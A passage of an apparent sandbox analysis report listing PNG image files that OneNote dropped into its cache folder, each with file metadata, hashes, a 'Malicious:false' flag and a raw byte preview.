                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13084
                                                                                                                                            Entropy (8bit):7.940058639272698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                            MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                            SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                            SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                            SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000031.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17289
                                                                                                                                            Entropy (8bit):7.962998633267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                            MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                            SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                            SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                            SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000032.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2332
                                                                                                                                            Entropy (8bit):7.8822150338370776
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                            MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                            SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                            SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                            SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000033.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13737
                                                                                                                                            Entropy (8bit):7.916899917415529
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                            MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                            SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                            SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                            SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!......*......9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000034.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1924
                                                                                                                                            Entropy (8bit):7.836744258175623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                            MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                            SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                            SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                            SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000035.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11886
                                                                                                                                            Entropy (8bit):7.946442244439929
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                            MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                            SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                            SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                            SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000036.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16003
                                                                                                                                            Entropy (8bit):7.959532793770661
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                            MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                            SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                            SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                            SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000037.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4190
                                                                                                                                            Entropy (8bit):7.94161730428269
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                            MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                            SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                            SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                            SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000038.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):11332
                                                                                                                                            Entropy (8bit):7.9324721568775285
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                            MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                            SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                            SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                            SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000039.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4490
                                                                                                                                            Entropy (8bit):7.928016176674318
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                            MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                            SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                            SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                            SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003A.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13241
                                                                                                                                            Entropy (8bit):7.931391290415517
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                            MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                            SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                            SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                            SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003B.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4181
                                                                                                                                            Entropy (8bit):7.943341403425058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                            MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                            SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                            SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                            SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003C.bin

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                            File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14553
                                                                                                                                            Entropy (8bit):7.951135681293377
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                            MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                            SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                            SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                            SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                            Malicious:false
